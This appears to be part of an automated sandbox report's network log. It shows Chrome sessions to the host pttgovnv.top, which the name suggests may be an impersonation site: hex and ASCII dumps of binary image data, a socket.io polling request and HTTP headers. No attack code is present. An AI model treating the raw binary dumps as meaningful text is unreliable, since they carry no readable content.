          2024-09-01 22:25:26 UTC1369INData Raw: 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 28 49 aa 25 61 6d cd 1c 08 00 00 fc 37 6b 64 64 84 a3 80 a0 42 5c a3 f5 df 1e 6b db 6a 6d 9d d2 bc bb 8f 83 32 33 d5 3f da 53 6f fd d3 66 6d 8d 51 39 3b ad 4d cf c7 54 df 9d eb fa 22 74 9c f4 18 15 fb c1 a7 cb da f7 54 44 9f 43 3d a6 c9 30 f7 0f 20 c4 01 fe 07 b9 b8 f5 df 2d d6 d6 6b 6d 09 c2 dc 8c 0c 70 ed f6 f3 2e 52 17 d1 5d ec d7 c0 91 d9 ca 11 3c ac 63 14 33 af 8f 06 97 7f ba c7 da da 83 de 67 6b ff 3a ac 7f e2 1e 9e c3 9d 66 ff 78 cd 03 84 38 54 68 90 d3 0b 4c 53 de 1b 7b 97 7d d1 6c de 9d e6 00 4d fb 00 b7 bd c2 76 bb d7 9c 9f 89 30 02 9d 09 70 bb 4a 0c a1 8d 41 05 25 13 e0 1e 28 e1 26 f6 58 fb 46 b7 0a 80 10 87 0a 0d 71 8d e2 34 5f d5 4d 70 c1 4c 99 2d 69 6d 69 82 dd b4 0a
          Data Ascii: @ B!(I%am7kddB\kjm23?SofmQ9;MT"tTDC=0 -kmp.R]<c3gk:fx8ThLS{}lMv0pJA%(&XFq4_MpL-imi
          2024-09-01 22:25:26 UTC1369INData Raw: 7b 1d 7e ef 1f 40 88 23 c4 21 1a 41 ae 5d 74 70 42 f1 7a 4d b0 13 73 d1 55 7d 66 eb 9c 24 c8 f5 db 17 13 a7 39 d6 eb be 36 9a 30 e7 77 bf b9 6e 13 32 d3 84 b8 f2 84 b8 80 82 5c bf b5 ef f5 21 84 38 b7 f4 35 d4 61 ed 5b 57 48 cf a1 97 d7 43 3c ac e7 1d a8 44 34 a7 22 1a 9c 50 b5 c9 c5 5f e8 20 86 56 b3 6d 31 db 03 26 08 d6 4d f2 77 75 e2 8c 64 6d 2f 61 5f d3 a6 df 9c df 7d a9 f4 b1 a4 4a da 37 94 cc 54 80 da c4 bf a9 67 ea ac 30 14 c5 fe 8f f6 7c 8b d6 be 45 b5 02 6c f7 1f 65 be 3d 80 10 87 e9 19 e4 4a b1 bd e4 81 05 c1 84 b9 4c c8 ec a2 af 5c 59 83 5c 5a fc 9d e7 ad 31 c2 0f 77 73 c4 97 09 eb 34 d5 51 00 84 38 4c 83 20 e7 57 85 24 e1 d3 3e 07 11 e6 36 88 36 e9 31 82 b5 9c 41 4e 2b 54 7e 0d 74 88 fa f3 d8 1e e1 7d ab 8b f8 fe 01 84 38 20 2f c8 dd 3d 49 58
          Data Ascii: {~@#!A]tpBzMsU}f$960wn2\!85a[WHC<D4"P_ Vm1&Mwudm/a_}J7Tg0|Ele=JL\Y\Z1ws4Q8L W$>661AN+T~t}8 /=IX
          2024-09-01 22:25:26 UTC1369INData Raw: 73 5d 30 fd 80 9c 0a 5b cc 4c 72 9b 5d 95 cb 0c 56 d8 66 3f d6 e8 37 9b 4e fe 18 9d 41 17 6e 2a 43 f5 d3 fc 34 de 65 9d 57 95 b6 cf 3b ac d7 41 9a 77 20 00 41 61 60 c3 f4 0e 6f 31 b3 54 d6 f6 b0 02 9c 11 fc 68 49 67 1a 92 46 19 bf 76 6a 66 0a 91 f6 0a 7f fa e8 0c 5f f9 e2 1c 02 00 84 38 b8 0d 6f ba 54 96 86 1c 9d ef ad b5 0c bb 10 0b e5 5e c6 d6 4e 5d 27 b9 6b 90 36 d8 c1 d5 59 7f 35 56 a1 4f 23 21 ae b2 6d a5 0a 07 80 10 07 b7 01 4e 3f fd eb c5 63 63 19 77 a3 c1 74 16 0f 87 36 3f 3a 6b 90 6a 98 d3 ca 5c 66 0e b9 56 71 9a 58 d3 15 57 99 73 9a 83 bb 39 a3 2b 92 ae df db c9 61 00 40 88 43 b1 e1 ad cd 2c 95 a5 1d e2 eb 22 b0 4b e1 87 26 27 cc 69 65 ae 51 9c a5 bb 32 21 28 53 99 d3 91 9f 89 0a 9a 53 cd 4d 35 2e 5d e4 79 d2 c1 ab 25 f8 73 9f 65 a2 00 84 81 81
          Data Ascii: s]0[Lr]Vf?7NAn*C4eW;Aw Aa`o1ThIgFvjf_8oT^N]'k6Y5VO#!mN?ccwt6?:kj\fVqXWs9+a@C,"K&'ieQ2!(SSM5.]y%se
          2024-09-01 22:25:26 UTC1369INData Raw: 3c ec b7 86 4e d6 a3 f4 f7 62 ee a6 0a d7 ce 3c 69 d3 42 23 87 00 20 c4 21 1a 41 ae cb 04 a2 de 12 83 dc 43 66 9a 89 b0 f6 3b e5 31 c8 e9 40 87 04 cf bc 2f dc 1c c7 1d 2c e8 0e 00 84 38 04 13 88 b4 49 74 67 89 37 b5 3d cc 80 54 42 90 db 48 90 2b 8d a9 bc 16 3b 22 55 fb 30 b2 96 6d 99 5f e6 3e de 56 10 dd 27 d2 3e 9e 9b 31 9e 6e 80 10 37 d3 82 9c 0e 78 d0 0b f3 d6 12 6f 4a 03 52 2a ac be 67 04 b9 b2 04 38 7d 6e 8b ed 43 a7 cf 0b cd a8 d1 f8 a0 36 23 42 9c d0 dc 0b 10 e2 66 f0 9b 7d dc fa 67 bd 94 d6 bc aa 7d cf d2 61 0d 78 20 c8 85 4e 03 5c b1 1d c8 3b 7c 0e 10 f0 ae df a7 db 09 e2 75 ed 67 c8 8f f1 54 03 84 b8 99 1c e4 92 52 7a f3 aa f6 93 7b 4e d7 2f 0d 39 c8 b9 9d 7e 44 83 5c 92 51 ab c5 31 cd a8 c5 0e 66 d8 c1 a4 be 91 e2 57 98 6e f2 7b 84 aa cf 41 9f
          Data Ascii: <Nb<iB# !ACf;1@/,8Itg7=TBH+;"U0m_>V'>1n7xoJR*g8}nC6#Bf}g}ax N\;|ugTRz{N/9~D\Q1fWn{A
          2024-09-01 22:25:26 UTC1369INData Raw: dd 1e 73 61 ea 0a 73 8e 33 33 22 34 96 b5 35 94 f1 b0 69 c5 cd 9e a5 be 12 e6 b0 23 c4 95 fd f5 d5 15 f4 f9 ea 25 c4 85 18 34 09 71 00 21 0e 21 05 a5 4c 53 e6 54 53 25 64 66 8c ef 2c 47 90 31 fd fd 9a 4d a0 d3 7f 75 df 83 a8 d6 69 a5 2d 2d 63 d3 9a a4 a6 f3 fa a6 84 b8 c0 ce d5 84 78 9b d3 31 d0 10 97 15 34 13 12 5c b5 9b 10 07 10 e2 50 86 0b 4f 2c 6b 6b 9a 22 e8 e8 45 a0 ec 4d 8a 26 88 66 6f 22 63 a3 4d 27 93 96 b1 11 ac 1a 4a fb e8 94 4f 88 f3 f9 d8 ba 59 92 2d b4 10 97 b5 7f 3a b8 48 43 bc df 55 39 42 1c 40 88 43 85 84 ba 3d 26 d0 75 4d 87 3e 62 33 f0 79 d6 e0 db e3 c3 4d 69 a5 b6 71 3a 57 2d 4b 0c ca 71 1f c3 9c 6f 21 c9 bc ce 3b cc e6 57 98 db 66 ed 5f 07 cf 3c 40 88 43 b4 2e 46 99 40 d7 6c b6 86 02 81 ae cb 04 ba 14 47 ac 62 9e 57 3f 3a bc 6f 65 f1
          Data Ascii: sas33"45i#%4q!!LSTS%df,G1Mui--cx14\PO,kk"EM&fo"cM'JOY-:HCU9B@C=&uM>b3yMiq:W-Kqo!;Wf_<@C.F@lGbW?:oe
          2024-09-01 22:25:26 UTC1369INData Raw: 87 25 cc 73 cb af 41 09 0c 6e 00 21 2e e2 9f 68 fd fe a4 55 3f 43 c2 db 84 1d aa 35 bc 7d e4 aa c5 ae fb b8 9d 3a 7b 51 92 fb 07 e5 f9 be 21 d9 7b fa 9c f4 58 5f ff e4 cc 39 59 59 53 65 87 ad da 59 22 ef 98 5d 2d 7f 76 e5 52 d9 73 fc b4 dc b4 7c 81 dc bc 7a be bc 7c e2 ac 5c b9 78 76 d1 f7 a3 55 c0 8f 5c b3 44 ee b9 bc 7e a2 30 a7 15 8e 36 1d 94 11 e9 fe 72 51 bf 10 e9 6b ab 79 77 92 37 99 c8 06 fc 58 c5 3e fa a9 cf 2d bf ce f9 26 4e 35 10 e2 66 96 d6 e9 fe 00 4d f5 4d fb 9b e4 34 9b ea c8 d2 ff 70 c5 e2 a2 2b 6f 1a da 1e 4b 0f c8 ae c3 83 72 e0 dc 45 f9 d9 f0 05 19 bc 30 7e 20 42 26 60 d5 cc 9a 25 77 2c 9d 27 c7 86 ce cb 09 eb 6f 3f f2 fc 11 39 9a ba 28 d5 e6 f7 ae b6 02 de 65 56 e0 bb b1 7e 8e dc d5 50 27 97 4f 11 ec f2 c3 dc 9f f6 f4 e7 7f da d7 26 d6
          Data Ascii: %sAn!.hU?C5}:{Q!{X_9YYSeY"]-vRs|z|\xvU\D~06rQkyw7X>-&N5fMM4p+oKrE0~ B&`%w,'o?9(eV~P'O&
          2024-09-01 22:25:26 UTC1369INData Raw: 94 75 1b 7d 17 dc 05 c1 97 ac 20 fa 1f 5f 3e 2e 9f b7 6e 23 9f 36 21 17 08 72 db 43 0a 72 71 d1 75 79 a7 ae ca 69 a7 ef f5 d6 ef 77 f8 70 9f 7a 1e 34 9a 00 d9 3f 45 85 44 d7 98 e4 22 0b ce 2d cc 58 b3 46 46 46 38 0a 61 73 56 6c d8 e5 f3 1b d4 ac 0a 0e 71 49 c9 9a b0 78 a2 00 a7 55 b2 7b ac 00 97 df f7 4d fb a0 6d 7b cb 62 7b 84 e7 9e 23 43 72 fb 33 6f c8 62 2b c8 69 ec d1 69 44 74 fa 0f ed 17 a7 df 7b 76 fd 9b ec aa d9 1f 5b b7 f3 fc d0 79 3b e0 a5 cf 5d 10 ed 6d 77 c2 7a 29 fc ee a2 5a 59 31 af 56 ea 6b ab e4 63 ef 58 3a e1 3e eb 88 d6 a6 27 f6 d9 ff df 58 5b 6d 85 c0 91 29 ab 82 c5 d0 c9 8b 75 ca 91 7c cf 1e 3a 23 b7 fd 2c a7 e9 55 2f 42 b1 be 3b d7 a5 42 3e 6f 1b cd a6 17 b7 94 bd 05 79 a1 73 d6 be d4 fb cb cc 53 a6 e7 4a 9a e9 1e 42 7f cf d2 40 bf c5
          Data Ascii: u} _>.n#6!rCrquyiwpz4?ED"-XFFF8asVlqIxU{Mm{b{#Cr3ob+iiDt{v[y;]mwz)ZY1VkcX:>'X[m)u|:#,U/B;B>oysSJB@
          2024-09-01 22:25:26 UTC1369INData Raw: e2 fe f7 4b c7 e5 b1 e3 43 81 1d 3c ed 1f a8 73 e5 3d 76 db 9a d1 ef 69 b3 aa 4e b3 a2 21 2f 73 58 75 ee 3d df e6 8e 4b b5 68 65 af dd 6c 4d 05 7e ae 93 e3 25 c4 db a2 f7 93 dd 6f bb 09 a4 13 dd 67 97 b9 cf 74 44 2e 7c cd 66 6b 34 ff d6 15 f9 b7 99 ff d3 55 02 f4 f8 25 45 27 9c 75 2e a0 29 de 32 02 79 be 2a e7 dc 0a e7 78 b4 99 e3 d1 5a e0 67 7b cc b1 48 70 e2 44 13 2b 36 94 ef 4d 7f 46 ad d8 60 aa 70 3d 99 af 27 5a 95 41 a7 f0 78 7c 92 7e 65 1a ca 32 4b 66 a9 4f ae 5a 38 3a 4f 5c 86 2e 83 f5 e9 17 8f ca 9f be 79 b1 dd 6f 2d 7f d4 ab 17 da 27 ed ef 7e 7d 42 2e 5b 30 5b 3e f0 e6 f1 83 30 de ff c3 bd 72 fc a2 3f ab 36 4c e5 de a5 f3 e4 8b 37 8d cd a7 a7 01 f2 9a ee 7d d9 bf b2 d5 0a 71 71 1f ce d3 66 73 41 6b 28 e2 b7 fb ed a0 e7 2c 6d 54 6a 68 ec 2a 78 41
          Data Ascii: KC<s=viN!/sXu=KhelM~%ogtD.|fk4U%E'u.)2y*xZg{HpD+6MF`p='ZAx|~e2KfOZ8:O\.yo-'~}B.[0[>0r?6L7}qqfsAk(,mTjh*xA
          2024-09-01 22:25:26 UTC1369INData Raw: dc 74 16 8d 73 8b 00 07 42 1c 2a 4d 7e 53 ea ad 2b e7 47 6a ff 1e 79 6d 40 ee eb e9 93 7f e8 19 ab 66 bd 68 26 cd bd 6a f6 58 b3 e4 9a 9a 2a 7b 95 84 b6 15 0b ec be 68 7d 11 aa c8 69 93 6a f6 ba aa da df 50 d7 82 8d 40 05 a1 3c 21 c2 6b a7 6b a7 cf d3 e6 69 f2 d2 9b ce 41 ae 7c 13 20 57 5a 87 7e ef 53 f6 4c 85 11 aa 84 38 cc b4 4f c1 3a 28 40 fb 6c 45 c9 0f cd bc 6a 6f 59 38 d6 17 4f 27 d1 fd db b7 5e 2a ef bb 64 ce e8 f7 3e d9 58 ef 4c f6 7b 60 20 72 07 58 9b 54 ff fa c5 63 39 df 6b 59 9c 73 9c cb d5 97 a7 a9 62 ce 52 67 10 46 e7 34 7b ed e9 f1 8f 17 f1 7b 3b 2b e8 31 f5 32 47 59 d9 03 1c 21 8e 10 87 99 18 e2 3e 50 37 37 12 3b a4 61 4c 57 57 a8 7f b4 47 5e 1b 3a 6f 7f ef d8 f0 f9 9c df 79 e4 f5 01 f9 bb 13 43 f6 84 c3 da 74 aa 53 91 1c 18 3c 2f cf 0e 5f
          Data Ascii: tsB*M~S+Gjym@fh&jX*{h}ijP@<!kkiA| WZ~SL8O:(@lEjoY8O'^*d>XL{` rXTc9kYsbRgF4{{;+12GY!>P77;aLWWG^:oyCtS</_


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          82192.168.2.449826172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P6liMU5&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC628INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 32
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRvr6Re67mTRIxSyhtPBtQUUl%2Be1a4AzH5iDhkv%2F%2BnXEKyrhQMIyT%2BKPz%2B7DTNagxCwksIBueCTDslpzVn0wFFQjnsatJ2LBtl%2BSWrUO8P%2FKMfkhisyCFp4ZJjtIljo%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1dae358c51-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 57 54 55 42 2d 42 66 42 31 50 73 2d 4c 32 75 52 42 51 55 47 22 7d
          Data Ascii: 40{"sid":"WTUB-BfB1Ps-L2uRBQUG"}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          83192.168.2.449827104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC361OUTGET /help/layout/images/42.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC726INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 12814
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"320e-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UPMYZhR%2BmtC7go9EGeXqEbYhhMKFpkjL6z3cUyUkMmYdBYcCE2NaWqiK5%2Ftq%2Fbandcbi4INpnoY8FyN2Ua5olO1MrOBKDznoOOdpQTnNai2Mif2i9G2MGxWU%2FEuXBA0%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1dbe8242b2-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC643INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 31 9b 49 44 41 54 78 da ec dd 4d 76 db 46 be 37 60 f8 3d 77 6e dd 15 88 bd 02 29 d3 4c cc ac c0 ca a8 87 a6 57 60 65 05 a6 57 10 79 05 a6 87 19 85 5e 81 a9 49 4f 43 ad 20 f4 0a ae b4 02 bf f8 5b 85 36 ad 48 22 3e 0a 24 28 3e cf 39 6c a5 2d 91 04 0a 1f f5 43 55 a1 f0 ec eb d7 af 05 00 00 fb e5 ff 29 02 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<1IDATxMvF7`=wn)LW`eWy^IOC [6H">$(>9l-CU)!!!@@@8888!!
          2024-09-01 22:25:26 UTC1369INData Raw: fb f9 ea ba fc b1 28 5f ab 32 c8 4d 94 08 00 ec 61 7d fe f5 eb 57 a5 70 a0 ca 00 17 41 ee 45 f9 fa 52 be a6 e5 6b 9e 02 1e 4f f9 a0 ff e3 6a 5c fe 88 f0 3e 4a db bf 72 b9 83 c5 89 fd 6d 19 17 14 df 2e 2a fe fd 6d 9f dc 65 d9 44 b9 9c 95 af 3a ad d4 b1 dc 17 e5 32 af b6 b4 cd 62 b9 4e 6b 2e d7 7c d7 65 09 08 71 f4 1b e2 46 e9 84 ff 3c fd d3 4d 71 db 42 37 8f 9f 65 a0 5b 29 a5 27 17 e0 22 a4 7c 18 f8 62 5e a6 7d 70 be 8d 80 94 ca e5 28 ed fb 27 2d de fe ba 5c ce 59 8f cb 16 9f fd aa c5 5b 3f 96 cb 35 b1 d7 83 10 c7 d3 0d 72 71 75 ff e7 03 bf be 49 21 2f 2a b7 a8 4c 57 65 b0 73 75 bf bf 01 6e 5c fe f8 bc 67 8b 7d 55 be 2e 52 a0 bb ee b1 6c 96 2d 03 5c e5 97 3e 5a be ca e5 9a 96 3f de 76 f8 88 77 e5 72 4d ed fd 20 c4 f1 74 83 5c d3 8a e2 4b 0a 75 c2 dd 7e 85
          Data Ascii: (_2Ma}WpAERkOj\>Jrm.*meD:2bNk.|eqF<MqB7e[)'"|b^}p('-\Y[?5rquI!/*LWesun\g}U.Rl-\>Z?vwrM t\Ku~
          2024-09-01 22:25:26 UTC1369INData Raw: 0f b7 e1 66 92 e9 e3 9e a7 31 77 43 12 c1 71 91 c2 ea 90 c4 05 d0 9f e6 d8 03 21 8e a7 13 e4 66 c5 e6 b1 4a 39 c6 31 bd cd 31 e5 47 0f 61 2e c6 05 2e 52 f7 32 db 0b 72 71 01 71 99 e9 e3 46 03 5c c5 b8 48 18 ea 93 25 2e ca 20 e7 c2 05 84 38 9e 48 90 8b 0a 75 fc 48 58 5b a4 a0 17 37 1b 7c 6a 19 9e be a4 ef c8 16 3e 33 86 b9 13 41 6e 27 a6 99 3e 67 a8 db ed c5 00 5b 09 ab 80 e9 86 10 18 b0 ff 51 04 34 0c 45 cb 14 62 e6 29 d4 ac 8b a9 21 a2 32 1a af 4f d1 91 fe fe e8 9e ca 74 7d 2c 50 3c ad 61 d9 e3 72 cf ca 1f b3 d4 5d 7b 5e b4 1f 67 15 ef fb ab fc 9c d7 e9 33 e9 59 4c 8f 51 86 9c ab 7b f6 b7 a6 86 dc aa 14 c7 cd 6a a0 cb 05 08 71 3c a1 20 b7 4a 53 8b 44 37 d0 ab 3b bf 8e 8a f6 db b4 21 55 28 bb 27 9c 2d 76 b8 ec 31 35 ca b7 40 57 74 1b cc 1e 8f 14 2b 04 b9
          Data Ascii: f1wCq!fJ911Ga..R2rqqF\H%. 8HuHX[7|j>3An'>g[Q4Eb)!2Ot},P<ar]{^g3YLQ{jq< JSD7;!U('-v15@Wt+
          2024-09-01 22:25:26 UTC1369INData Raw: f7 bf c5 ed a3 ac be a4 5f 45 0b 64 b4 cc c5 b3 4a 27 69 3a 92 a1 5b 64 de 27 8e d2 dd c8 e4 77 55 06 b8 a9 62 00 84 38 ba 56 d4 b3 f2 3f ff 2a 86 33 a6 6a eb 13 e9 56 dd ac 31 7f 5c f9 7f 7f 2a 5f ef 53 a0 8b bb 58 63 ae b9 ff 8b 1b 23 52 a0 1b 0d 74 73 36 09 71 75 a6 b4 88 3b 58 0d ba ef c7 44 11 00 4f 9d 1b 1b fa 0d 70 d1 12 d0 c7 7c 6f 21 ee 96 3c 4a 21 a8 a9 f3 5d 86 87 34 2d c9 b7 b9 f0 aa f9 e4 d2 2b fe fb db 33 61 cb 7f bf 4a 41 a8 7a 45 8b de 6a a7 db b3 5c ee f4 a4 8a 3a ea 2c 6b 6c bf 57 11 f2 4d c6 9a d5 6f e6 85 03 84 38 da 86 b7 b3 e2 c7 a9 36 72 8a d6 ab 69 59 49 cd d2 f7 fc d9 e2 33 e2 2e d5 f1 10 82 43 0a 74 cb 2a 54 ae 3d e5 61 94 5e f1 ff a7 e9 77 d5 db 16 6b c1 6e db 95 75 9d a9 46 6e 6a 2e 57 35 97 dc 45 61 5e b9 5c 3e 79 e6 27 20 c4
          Data Ascii: _EdJ'i:[d'wUb8V?*3jV1\*_SXc#Rts6qu;XDOp|o!<J!]4-+3aJAzEj\:,klWMo86riYI3.Ct*T=a^wknuFnj.W5Ea^\>y'
          2024-09-01 22:25:26 UTC1369INData Raw: f0 a9 dc 0e ca 72 b7 56 03 0e 4b 37 99 f6 c9 33 9b 19 84 38 ea 5f 41 47 4b cc fb 0e 1f f3 b6 3c f1 f6 3e 31 f0 da 9d b6 9f 1a be f5 77 f3 c8 3d 28 c6 c1 9d d4 f8 bb 08 cf 13 c5 b5 f3 e3 35 db dd c0 3d b4 52 e7 5a 36 21 0e 84 38 9a 84 a3 d4 c2 d2 a5 55 2e ae ec 57 7d 5f 45 a7 65 3d 6b 11 3a ab 71 7c 23 5b fc bf 95 78 6c f3 3a 77 a3 46 80 1b 7b 2a c3 60 5c 66 fa 9c dc 21 6e 91 2b c4 79 94 1e 08 71 34 0f 48 71 12 ee d2 2a 57 4d 43 32 db 42 ab 5c 04 90 5f 8b 66 5d 38 d5 c4 c5 93 43 df d6 a9 0c 7e af f1 a7 df ee 44 15 e0 06 25 57 8b d7 8b cc 63 5a 73 85 b8 38 8f e8 b6 07 21 8e 16 e1 a8 6a 95 fb a9 c3 15 ff ab 14 96 c6 3d 2f eb bc 68 fe 44 8a a8 20 62 9c dc fc 50 af f6 53 80 fb 50 33 c0 8d dd 89 3a 38 39 6f 2c c9 76 c1 95 f1 e6 86 f0 d6 dd e5 20 c4 d1 fe 84 bc
          Data Ascii: rVK738_AGK<>1w=(5=RZ6!8U.W}_Ee=k:q|#[xl:wF{*`\f!n+yq4Hq*WMC2B\_f]8C~D%WcZs8!j=/hD bPSP3:89o,v
          2024-09-01 22:25:26 UTC1369INData Raw: d9 f1 63 fe 65 1b df 1b e6 26 19 42 53 f6 80 9c 69 e2 6d ad af 20 c4 f1 04 83 dd a8 f8 e7 78 b5 27 79 63 c0 13 da 6e 51 a9 b7 b9 cb 32 c6 0f 9e 97 db 74 a6 14 1f 2d df b8 c8 a9 c6 9b 36 09 4e 71 dc 8c fb 6a d5 6e 38 0e f6 ae 5f cb e5 9a db ba 20 c4 71 18 95 58 5c b5 57 3f e7 9e b9 38 b8 6d 14 15 fa a4 b8 7f 0c e1 7d aa 6e f3 95 d2 6b 75 b1 53 1d 0b 0f 95 77 5c ec 6c 75 f2 e8 b5 e5 1a a5 9f 45 5a c6 93 b5 50 b9 2c 9e c0 f4 3a 20 c4 01 00 30 28 ff 4f 11 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 3b f5 3f 8a 80 c7 7c fd cf c9 69 f9 e3 68 ed 9f 96 cf 7e be ba 56 32 b5 ca 2e ca ed 74 ed 9f ae cb b2
          Data Ascii: ce&BSim x'ycnQ2t-6Nqjn8_ qX\W?8m}nkuSw\luEZP,: 0(OqqqBBB qqqB;?|ih~V2.t
          2024-09-01 22:25:26 UTC1369INData Raw: 85 bf d2 72 ec 73 59 ce 1a 96 e1 b4 c5 77 8c 1b 9e 44 2f 0e 78 f7 9e 16 f5 5b 7b 9e ef ba ac 62 9c 5b f9 9a a5 c0 b0 8d 8a 32 5a 27 3e 97 df 39 4f 01 a3 af 75 ba d8 e2 3a 15 e9 18 fc 3b ca 32 8d 1d ec 6a d2 f5 98 4e 2d 79 7f f7 50 06 b1 df fe 5e 7e fe 22 d3 ba de 1b 3e e3 f3 b7 bc 0d ef db a6 cb 14 ce 36 2e ef 00 ce 7b 2f 0e fc dc 2b c4 6d 29 74 9c a6 96 8a 37 03 59 a4 37 e5 32 cd 53 77 e1 53 0f 70 a1 4d 77 f5 a4 e1 df 1f a7 f1 79 87 e8 ac e7 bf cf dd ca b1 da d1 85 d4 cb 54 41 9e 65 5e a7 38 bf 2c 76 78 7e 89 b2 5c 65 58 af 26 ef 7f 7e f7 fb 52 30 ff bd e7 75 8d d0 90 3d c8 a5 d0 b4 dc 61 78 bb 1b 58 3f a4 8b 82 4d db eb f9 00 96 f7 55 81 10 d7 63 e8 88 83 f3 af 62 3b 63 05 9a 56 28 17 7b 56 96 b3 2d 1e b0 e3 16 ef 39 3d c0 fd 7b dc e2 44 fe 3c 5d d8 6c
          Data Ascii: rsYwD/x[{b[2Z'>9Ou:;2jN-yP^~">6.{/+m)t7Y72SwSpMwyTAe^8,vx~\eX&~R0u=axX?MUcb;cV({V-9={D<]l
          2024-09-01 22:25:26 UTC1369INData Raw: e4 1e 6b ed 8f 6e c9 9c dd 7f 75 9c 67 fa be b6 fb 41 93 73 67 dd 3a e2 4b d1 df 1c 9e 6d eb 08 21 4e 88 7b e2 2d 01 b7 dd 99 75 06 01 bf cb d9 8d 7a 67 19 16 fb 50 56 19 02 5c 8c 15 f9 49 80 63 4d 9b bb 0c 6f 7a 9a cf ac 6d 77 e2 b8 87 65 f9 90 ee 12 cc 12 e4 d2 cd 00 3f a5 73 5d dc 14 50 4d 1a fc 53 9b 31 69 1d 7d 49 5d 84 39 b4 3d 77 3e 6f 50 7e b3 a2 de f8 bb 49 8f e5 68 6a 8e 03 65 8a 91 7a 21 2a a6 fb 88 ff 7c e8 b6 ea cb f8 9b 43 2e a3 34 b7 5d d7 00 37 ee 2b 08 b3 87 c7 5d fb 47 3d f5 32 76 2b 2a e0 72 99 a2 b2 6e 3a 19 f0 f8 91 cf 8c 07 af b7 5d a4 b7 a9 45 2e ce 3d f3 ae 01 21 dd 29 39 84 e3 2f e7 30 8a 6d ad 4f 35 87 de 43 17 1d ef 4c af 81 10 b7 fb 20 37 4b 07 6b b4 38 8d 52 68 59 f5 d9 72 94 5a b7 ce 86 5c 36 19 02 dc b7 f9 92 04 38 ea 86 9f
          Data Ascii: knugAsg:Km!N{-uzgPV\IcMozmwe?s]PMS1i}I]9=w>oP~Ihjez!*|C.4]7+]G=2v+*rn:]E.=!)9/0mO5CL 7Kk8RhYrZ\68
